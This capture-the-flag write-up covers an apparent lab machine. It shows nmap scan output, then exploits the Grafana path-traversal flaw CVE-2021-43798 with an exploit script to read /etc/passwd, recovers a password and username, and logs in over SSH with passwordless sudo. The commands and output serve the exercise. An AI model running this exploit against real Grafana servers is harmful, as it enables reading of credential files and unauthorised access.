📚 Table of Contents
# Nmap 7.92 scan initiated Sat May 7 12:53:58 2022 as: nmap -vvv -p 22,111,3000,5000 -sS -sV -sC -oN 10.10.245.226.kubernetesforyouly.nmap.txt 10.10.245.226
Nmap scan report for 10.10.245.226
Host is up, received echo-reply ttl 61 (0.19s latency).
Scanned at 2022-05-07 12:53:59 PDT for 114s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:35:e1:4f:4e:87:45:9e:5f:2c:97:e0:da:a9:df:d5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTRQx4ZmXMByEs6dg4VTz+UtM9X9Ljxt6SU3oceqRUlV+ohx56xdD0ZPbvD0IcYwUrrqcruMG0xxgRxWuzV+FQAJVQe76ED966+lwrwAnUsVFQ5apw3N+WKnD53eldUZRq7/2nGQQizrefY7UjAGX/EZonSVOWZyhVyONu2VBBwg0B0yA3UBZV+yg+jGsrZ9ETEmfNbQRkbodEAwoZrGQ87UEdTkfj+5TGmfzqgukmBvvVV7KoXgSQIZNkqRmkAVKKXeEfydnOR37KMglBUXIR/50jkIswxWbNk2OtS6fz6UiPeEY39f4f0gwLx/HwUyel9yzH4dkDb+LBS6X/X9b9
| 256 b2:fd:9b:75:1c:9e:80:19:5d:13:4e:8d:a0:83:7b:f9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAqCgW5Mlx2VpC61acc0G4VMZUAauQDoK5xIzdHzdDLPXt0GqsoIw1fuwTSSzSy8RFmGU5PNHiWn0egoUwlXdc4=
| 256 75:20:0b:43:14:a9:8a:49:1a:d9:29:33:e1:b9:1a:b6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFZ/jrfDX1aK1I0A/sLRVb2qoCF9xHWbVW+gBCV8dSmg
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
3000/tcp open ppp? syn-ack ttl 60
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 May 2022 19:54:40 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 May 2022 19:54:06 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 May 2022 19:54:11 GMT
|_ Content-Length: 0
5000/tcp open http syn-ack ttl 60 Werkzeug httpd 2.0.2 (Python 3.8.12)
|_http-title: Etch a Sketch
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Werkzeug/2.0.2 Python/3.8.12
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port3000-TCP:V=7.92%I=7%D=5/7%Time=6276CE5E%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20te
SF:xt/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x2
SF:0Request")%r(GetRequest,174,"HTTP/1\\.0\\x20302\\x20Found\\r\\nCache-Control
SF::\\x20no-cache\\r\\nContent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nExpire
SF:s:\\x20-1\\r\\nLocation:\\x20/login\\r\\nPragma:\\x20no-cache\\r\\nSet-Cookie:\\x
SF:20redirect_to=%2F;\\x20Path=/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Content
SF:-Type-Options:\\x20nosniff\\r\\nX-Frame-Options:\\x20deny\\r\\nX-Xss-Protecti
SF:on:\\x201;\\x20mode=block\\r\\nDate:\\x20Sat,\\x2007\\x20May\\x202022\\x2019:54:
SF:06\\x20GMT\\r\\nContent-Length:\\x2029\\r\\n\\r\\n<a\\x20href=\\"/login\\">Found</
SF:a>\\.\\n\\n")%r(Help,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Typ
SF:e:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x
SF:20Bad\\x20Request")%r(HTTPOptions,12E,"HTTP/1\\.0\\x20302\\x20Found\\r\\nCach
SF:e-Control:\\x20no-cache\\r\\nExpires:\\x20-1\\r\\nLocation:\\x20/login\\r\\nPrag
SF:ma:\\x20no-cache\\r\\nSet-Cookie:\\x20redirect_to=%2F;\\x20Path=/;\\x20HttpOn
SF:ly;\\x20SameSite=Lax\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nX-Frame-Op
SF:tions:\\x20deny\\r\\nX-Xss-Protection:\\x201;\\x20mode=block\\r\\nDate:\\x20Sat
SF:,\\x2007\\x20May\\x202022\\x2019:54:11\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r
SF:\\n")%r(RTSPRequest,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Ty
SF:pe:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\
SF:x20Bad\\x20Request")%r(SSLSessionReq,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Requ
SF:est\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20
SF:close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(TerminalServerCookie,67,"HTTP/1\\
SF:.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=
SF:utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(TLSSessi
SF:onReq,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/p
SF:lain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Req
SF:uest")%r(Kerberos,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Typ
SF:e:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x
SF:20Bad\\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\\.0\\x20302\\x20Found\\r
SF:\\nCache-Control:\\x20no-cache\\r\\nContent-Type:\\x20text/html;\\x20charset=
SF:utf-8\\r\\nExpires:\\x20-1\\r\\nLocation:\\x20/login\\r\\nPragma:\\x20no-cache\\r
SF:\\nSet-Cookie:\\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\\.txt%
SF:252ebak;\\x20Path=/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Content-Type-Opti
SF:ons:\\x20nosniff\\r\\nX-Frame-Options:\\x20deny\\r\\nX-Xss-Protection:\\x201;\\
SF:x20mode=block\\r\\nDate:\\x20Sat,\\x2007\\x20May\\x202022\\x2019:54:40\\x20GMT\\
SF:r\\nContent-Length:\\x2029\\r\\n\\r\\n<a\\x20href=\\"/login\\">Found</a>\\.\\n\\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sat May 7 12:55:53 2022 -- 1 IP address (1 host up) scanned in 114.99 seconds
| Ports | Service | Notes |
|---|---|---|
| 22/tcp | SSH | Got login comment in CSS on Webapp on port 5000. |
| Got password from LFI on Grafana of /etc/passwd on port 3000. | ||
| 111/tcp | RPC Bind | |
| 3000/tcp | HTTP | Grafana 8.3.0 |
We found Grafana was vulnerable to CVE-2021-43798. We used that to get /etc/passwd which provided us the password to login, hereiamatctf907.
We found the username on the webapp on port 5000. There was a comment in the CSS that led to a pastebin. That pastebin has a base32 string, OZQWO4TBNZ2A====, which decoded to vagrant.
$ python3 50581.py -H <http://10.10.173.247:3000> -f /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:hereiamatctf907:/home/grafana:/sbin/nologin
Build software better, together
OZQWO4TBNZ2A==== - Pastebin.com
Using the username and password combo we got above, vagrant:hereiamatctf907, we were able to SSH into the host and also quickly escalate to root on that host.
$ ssh vagrant@$IP
vagrant@johnny:~$ sudo -l
Matching Defaults entries for vagrant on johnny:
env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User vagrant may run the following commands on johnny:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
(ALL) NOPASSWD: ALL
(ALL) NOPASSWD: ALL
(ALL) NOPASSWD: ALL